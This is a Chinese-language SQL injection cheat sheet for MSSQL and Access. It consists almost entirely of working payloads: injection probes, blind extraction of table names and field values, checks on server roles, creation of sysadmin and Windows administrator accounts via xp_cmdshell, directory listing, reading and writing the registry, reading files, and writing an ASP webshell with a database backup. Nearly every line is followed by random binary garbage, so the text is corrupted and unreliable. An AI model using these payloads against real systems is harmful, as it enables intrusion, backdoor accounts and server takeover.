1.判断是否有注入;and 1=1 ;and 1=2 `�5�n^DP*X
2.初步判断是否是mssql ;and user>0 rNI��CK2Ah
&~'i��,v|E
3.注入参数是字符'and [查询条件] and ''=' `�Om
W�#�\
?�;�A\>s�P
4.搜索时没过滤参数的'and [查询条件] and '%25'=' V� P��(JV�
�O��S�1f}<
5.判断数据库系统 `|�mV~F|
�,�+X:#��$
;and (select count(*) from sysobjects)>0 mssql bK{ V�jX�F
BU|)lU5�)z
;and (select count(*) from msysobjects)>0 access AmJ�dZs|/
�HkY#i;%N�
�X{�:3UTBR
�;p�87^:��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9��P�*�f�
���&da�:�{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 (�B%[NC��6
qpzyl~g�:C
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]YOWCFAQot
��@z:E]O}�
9.(1)猜字段的ascii值(access) S+*>"�"=�
i~)EU����F
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E33WT{H&_'
b�f.yA:~�U
(2)猜字段的ascii值(mssql) 24wr=�5p]Q
S,Q�(,e�^&
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &he:�_p$�x
=��J]M#6N0
10.测试权限结构(mssql) B
]sVlbt��
wFjQ1�<s�=
/ %iS\R%ca
�N^�Alh�R^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- m�H�a~c(x
h i��K��}&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- L(9�Ac�P��
L[��<��CEk
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- u�x,���e�Y
��h"�'}Z^�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �|?�hsMN��
G[u{! 2RS�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {,?�Gj@$
U*� uMMb}$
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �)*�Wz�5x
�sCp)o,�;
;and 1=(select IS_MEMBER('db_owner'));-- 1QnaZ�hu'
��ly6�dl��
[;o>q;75Jz
R����<%{I)
11.添加mssql和系统的帐户 �jVHS1Vsei
yU"#2 ��*C
;exec master.dbo.sp_addlogin username;-- 8 qZbs�Zi4
;exec master.dbo.sp_password null,username,password;-- ZI8@ 6��L\
"�KS�dC8MS
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �J�6�ed��
e)}=T0��
s
;exec master.dbo.xp_cmdshell 'net user username password �7#X��`��D
~yV?�*"�Hi
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �qT�&zg�@m
}l�C�Q+s�!
;exec master.dbo.xp_cmdshell 'net user username password /add';-- M(uJ'�Ud/!
&J�D^\+7U:
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �+_�QcLuV,
UIU6ri�lB�
J3B+W�D�]�
G�iXs`Y�t|
12.(1)遍历目录 sGp�AaG�Y>
-K�fMK�N~�
;create table dirs(paths varchar(100), id int) 91DevizXx�
�"
�RIt��
;insert dirs exec master.dbo.xp_dirtree 'c:\' m� Ph=�bG�
.�Yz^r?3�t
;and (select top 1 paths from dirs)>0 @\>7
wt_�'
NLU�O{'uUW
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
'-$c�vH7_
B|{E[]�i�K
;�Cjj_9e,:
l��)'*�jZ
(2)遍历目录 M��m�Ft�G-
,f<�J4�U:Y
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #�
@7��I
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1�N5lI97j�
KP�$AT}D
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 a4Z� e!�l(
][YuJU�K8�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ikb7�7�?�.
L|�;sB=$'{
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 WG�yPyG#Fl
��vj]h[�=:
�mHJGpJ=a-
pd.unEW�wF
13.mssql中的存储过程
AsvH@�\\�
NJ;m&Tm,DF
xp_regenumvalues 注册表根键, 子键 Y]��5MM:mI
W�L�ta{A?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 H]���f[r~�
zz(E��H<�>
xp_regread 根键,子键,键值名 u1d�%w�OY
+H��p`(^(�
;exec xp_regread �{+3g*s/HI
(.L?sDQ</z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �] ;CJ6gM~
}O��TJ{e�G
xp_regwrite 根键,子键, 值名, 值类型, 值 d>N�h<PqH6
x3��.,zfWs
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 IYH4�@v/#
� 3UKd=YsJ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Kb1@��+���
�5w+�&plIJ
xp_regdeletevalue 根键,子键,值名 :_�=YH�+bZ
2�iO�{*cB�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 :uC9 �#H"b
c�++q5bg@)
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 !,�]c}Y{�i
^L8:..+:
GaL UZviJ_
�LnsYtkb�r
14.mssql的backup创建webshell G%�=�
gCR
)�|AxQP��d
use model �/N�ob�S'd
Pf?15POg&B
create table cmd(str image); F~bDg� tN3
�G��drVH,j
insert into cmd(str) values (''); U3�����UA�
M=SrZ��,W
backup database model to disk='c:\l.asp'; g-NrxyTBlx
|�YfJ#Agm+
i&�DUlmt)f
?32i��1F!�
15.mssql内置函数 8F�'s9c��,
oL<5�hN*D
;and (select @@version)>0 获得Windows的版本号 `>)pqI%L[g
B��glbQ'6p
;and user_name()='dbo' 判断当前系统的连接用户是不是sa f|)~_J���H
"}�H�2dn2n
;and (select user_name())>0 爆当前系统的连接用户 ���)@y7 qb
2�$A��"{2G
;and (select db_name())>0 得到当前连接的数据库 )e6�sg�]#�
x-4d VKE*z
�+��e�f>ek
{��k[dg0UV
16.简洁的webshell &!M�6{O=�~
��tYSf�eU
use model K]�|�hkp&
&fU48n�1Uh
create table cmd(str image); �"QD>�:G;u
)V*`(dn'zm
insert into cmd(str) values (''); b@K1;A! S�
imh�E=��6{
backup database model to disk='g:\wwwtest\l.asp';
